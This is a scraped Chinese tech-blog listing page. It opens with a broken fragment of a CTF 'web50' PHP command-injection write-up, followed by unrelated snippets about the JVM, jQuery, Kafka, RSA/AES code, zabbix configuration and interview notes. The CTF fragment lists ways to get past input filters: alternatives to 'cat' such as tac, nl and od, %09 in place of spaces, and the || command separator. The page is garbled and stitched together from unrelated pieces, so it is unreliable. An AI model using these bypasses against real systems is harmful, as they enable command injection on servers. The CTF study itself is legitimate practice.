    web50/dev/null2>&1");}}else{highlight_file(__FILE__);}做题之前先给大伙献上干货。1.绕过cat使用:tacmorelessheadtactailnlod(二进制查看)vivimsortuniqrev2.绕过空格用:%09/dev/null2>&1");其实就是将内容写入黑洞的意思,你的命令执行内容被带走了,所以这里使用命令分割||(只执行h前面
  • JVM StackMapTable 属性的作用及理解 lijingyao8206 jvm字节码Class文件StackMapTable
            在Java 6版本之后JVM引入了栈图(Stack Map Table)概念。为了提高验证过程的效率,在字节码规范中添加了Stack Map Table属性,以下简称栈图,其方法的code属性中存储了局部变量和操作数的类型验证以及字节码的偏移量。也就是一个method需要且仅对应一个Stack Map Table。在Java 7版
  • 回调函数调用方法 百合不是茶 java
    最近在看大神写的代码时,.发现其中使用了很多的回调 ,以前只是在学习的时候经常用到 ,现在写个笔记 记录一下   代码很简单:           MainDemo  :调用方法  得到方法的返回结果        
  • [时间机器]制造时间机器需要一些材料 comsci 制造
          根据我的计算和推测,要完全实现制造一台时间机器,需要某些我们这个世界不存在的物质     和材料...       甚至可以这样说,这种材料和物质,我们在反应堆中也无法获得......      
  • 开口埋怨不如闭口做事 邓集海 邓集海 做人 做事 工作
    “开口埋怨,不如闭口做事。”不是名人名言,而是一个普通父亲对儿子的训导。但是,因为这句训导,这位普通父亲却造就了一个名人儿子。这位普通父亲造就的名人儿子,叫张明正。      张明正出身贫寒,读书时成绩差,常挨老师批评。高中毕业,张明正连普通大学的分数线都没上。高考成绩出来后,平时开口怨这怨那的张明正,不从自身找原因,而是不停地埋怨自己家庭条件不好、埋怨父母没有给他创造良好的学习环境。      
  • jQuery插件开发全解析,类级别与对象级别开发 IT独行者 jquery开发插件 函数
    jQuery插件的开发包括两种: 一种是类级别的插件开发,即给 jQuery添加新的全局函数,相当于给 jQuery类本身添加方法。 jQuery的全局函数就是属于 jQuery命名空间的函数,另一种是对象级别的插件开发,即给 jQuery对象添加方法。下面就两种函数的开发做详细的说明。   1 、类级别的插件开发 类级别的插件开发最直接的理解就是给jQuer
  • Rome解析Rss 413277409 Rome解析Rss
    import java.net.URL;  import java.util.List;    import org.junit.Test;    import com.sun.syndication.feed.synd.SyndCategory;  import com.sun.syndication.feed.synd.S
  • RSA加密解密 无量 加密解密rsa
    RSA加密解密代码 代码有待整理 package com.tongbanjie.commons.util; import java.security.Key; import java.security.KeyFactory; import java.security.KeyPair; import java.security.KeyPairGenerat
  • linux 软件安装遇到的问题 aichenglong linux遇到的问题ftp
    1 ftp配置中遇到的问题    500 OOPS: cannot change directory   出现该问题的原因:是SELinux安装机制的问题.只要disable SELinux就可以了   修改方法:1 修改/etc/selinux/config 中SELINUX=disabled    2 source /etc
  • 面试心得 alafqq 面试
    最近面试了好几家公司。记录下; 支付宝,面试我的人胖胖的,看着人挺好的;博彦外包的职位,面试失败; 阿里金融,面试官人也挺和善,只不过我让他吐血了。。。 由于印象比较深,记录下; 1,自我介绍 2,说下八种基本类型;(算上string。楼主才答了3种,哈哈,string其实不是基本类型,是引用类型) 3,什么是包装类,包装类的优点; 4,平时看过什么书?NND,什么书都没看过。。照样
  • java的多态性探讨 百合不是茶 java
    java的多态性是指main方法在调用属性的时候类可以对这一属性做出反应的情况 //package 1; class A{ public void test(){ System.out.println("A"); } } class D extends A{ public void test(){ S
  • 网络编程基础篇之JavaScript-学习笔记 bijian1013 JavaScript
    1.documentWrite <html> <head> <script language="JavaScript"> document.write("这是电脑网络学校"); document.close(); </script> </h
  • 探索JUnit4扩展:深入Rule bijian1013 JUnitRule单元测试
            本文将进一步探究Rule的应用,展示如何使用Rule来替代@BeforeClass,@AfterClass,@Before和@After的功能。         在上一篇中提到,可以使用Rule替代现有的大部分Runner扩展,而且也不提倡对Runner中的withBefores(),withAfte
  • [CSS]CSS浮动十五条规则 bit1129 css
    这些浮动规则,主要是参考CSS权威指南关于浮动规则的总结,然后添加一些简单的例子以验证和理解这些规则。   1. 所有的页面元素都可以浮动 2. 一个元素浮动后,会成为块级元素,比如<span>,a, strong等都会变成块级元素 3.一个元素左浮动,会向最近的块级父元素的左上角移动,直到浮动元素的左外边界碰到块级父元素的左内边界;如果这个块级父元素已经有浮动元素停靠了
  • 【Kafka六】Kafka Producer和Consumer多Broker、多Partition场景 bit1129 partition
    0.Kafka服务器配置 3个broker 1个topic,6个partition,副本因子是2 2个consumer,每个consumer三个线程并发读取   1. Producer package kafka.examples.multibrokers.producers; import java.util.Properties; import java.util.
  • zabbix_agentd.conf配置文件详解 ronin47 zabbix 配置文件
    Aliaskey的别名,例如 Alias=ttlsa.userid:vfs.file.regexp[/etc/passwd,^ttlsa:.:([0-9]+),,,,\1], 或者ttlsa的用户ID。你可以使用key:vfs.file.regexp[/etc/passwd,^ttlsa:.: ([0-9]+),,,,\1],也可以使用ttlsa.userid。备注: 别名不能重复,但是可以有多个
  • java--19.用矩阵求Fibonacci数列的第N项 bylijinnan fibonacci
    参考了网上的思路,写了个Java版的: public class Fibonacci { final static int[] A={1,1,1,0}; public static void main(String[] args) { int n=7; for(int i=0;i<=n;i++){ int f=fibonac
  • Netty源码学习-LengthFieldBasedFrameDecoder bylijinnan javanetty
    先看看LengthFieldBasedFrameDecoder的官方API http://docs.jboss.org/netty/3.1/api/org/jboss/netty/handler/codec/frame/LengthFieldBasedFrameDecoder.html API举例说明了LengthFieldBasedFrameDecoder的解析机制,如下: 实
  • AES加密解密 chicony 加密解密
    AES加解密算法,使用Base64做转码以及辅助加密: package com.wintv.common; import javax.crypto.Cipher; import javax.crypto.spec.IvParameterSpec; import javax.crypto.spec.SecretKeySpec; import sun.misc.BASE64Decod
  • 文件编码格式转换 ctrain 编码格式
    package com.test; import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream;
  • mysql 在linux客户端插入数据中文乱码 daizj mysql中文乱码
    1、查看系统客户端,数据库,连接层的编码  查看方法: http://daizj.iteye.com/blog/2174993 进入mysql,通过如下命令查看数据库编码方式: mysql>  show variables like 'character_set_%'; +--------------------------+------
  • 好代码是廉价的代码 dcj3sjt126com 程序员读书
      长久以来我一直主张:好代码是廉价的代码。 当我跟做开发的同事说出这话时,他们的第一反应是一种惊愕,然后是将近一个星期的嘲笑,把它当作一个笑话来讲。 当他们走近看我的表情、知道我是认真的时,才收敛一点。 当最初的惊愕消退后,他们会用一些这样的话来反驳: “好代码不廉价,好代码是采用经过数十年计算机科学研究和积累得出的最佳实践设计模式和方法论建立起来的精心制作的程序代码。” 我只
  • Android网络请求库——android-async-http dcj3sjt126com android
    在iOS开发中有大名鼎鼎的ASIHttpRequest库,用来处理网络请求操作,今天要介绍的是一个在Android上同样强大的网络请求库android-async-http,目前非常火的应用Instagram和Pinterest的Android版就是用的这个网络请求库。这个网络请求库是基于Apache HttpClient库之上的一个异步网络请求处理库,网络处理均基于Android的非UI线程,通
  • ORACLE 复习笔记之SQL语句的优化 eksliang SQL优化Oracle sql语句优化SQL语句的优化
    转载请出自出处:http://eksliang.iteye.com/blog/2097999   SQL语句的优化总结如下   sql语句的优化可以按照如下六个步骤进行: 合理使用索引 避免或者简化排序 消除对大表的扫描 避免复杂的通配符匹配 调整子查询的性能 EXISTS和IN运算符 下面我就按照上面这六个步骤分别进行总结:
  • 浅析:Android 嵌套滑动机制(NestedScrolling) gg163 android移动开发滑动机制嵌套
    谷歌在发布安卓 Lollipop版本之后,为了更好的用户体验,Google为Android的滑动机制提供了NestedScrolling特性 NestedScrolling的特性可以体现在哪里呢?<!--[if !supportLineBreakNewLine]--><!--[endif]--> 比如你使用了Toolbar,下面一个ScrollView,向上滚
  • 使用hovertree菜单作为后台导航 hvt JavaScriptjquery.nethovertreeasp.net
      hovertree是一个jquery菜单插件,官方网址:http://keleyi.com/jq/hovertree/ ,可以登录该网址体验效果。 0.1.3版本:http://keleyi.com/jq/hovertree/demo/demo.0.1.3.htm hovertree插件包含文件: http://keleyi.com/jq/hovertree/css
  • SVG 教程 (二)矩形 天梯梦 svg
    SVG <rect> SVG Shapes SVG有一些预定义的形状元素,可被开发者使用和操作: 矩形 <rect> 圆形 <circle> 椭圆 <ellipse> 线 <line> 折线 <polyline> 多边形 <polygon> 路径 <path>
  • 一个简单的队列 luyulong java数据结构队列
    public class MyQueue { private long[] arr; private int front; private int end; // 有效数据的大小 private int elements; public MyQueue() { arr = new long[10]; elements = 0; front
  • 基础数据结构和算法九:Binary Search Tree sunwinner Algorithm
      A binary search tree (BST) is a binary tree where each node has a Comparable key (and an associated value) and satisfies the restriction that the key in any node is larger than the keys in all
  • 项目出现的一些问题和体会 Steven-Walker DAOWebservlet
         第一篇博客不知道要写点什么,就先来点近阶段的感悟吧。     这几天学了servlet和数据库等知识,就参照老方的视频写了一个简单的增删改查的,完成了最简单的一些功能,使用了三层架构。 dao层完成的是对数据库具体的功能实现,service层调用了dao层的实现方法,具体对servlet提供支持。  &
  • 高手问答:Java老A带你全面提升Java单兵作战能力! ITeye管理员 java
    本期特邀《Java特种兵》作者:谢宇,CSDN论坛ID: xieyuooo 针对JAVA问题给予大家解答,欢迎网友积极提问,与专家一起讨论! 作者简介: 淘宝网资深Java工程师,CSDN超人气博主,人称“胖哥”。 CSDN博客地址: http://blog.csdn.net/xieyuooo 作者在进入大学前是一个不折不扣的计算机白痴,曾经被人笑话过不懂鼠标是什么,
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他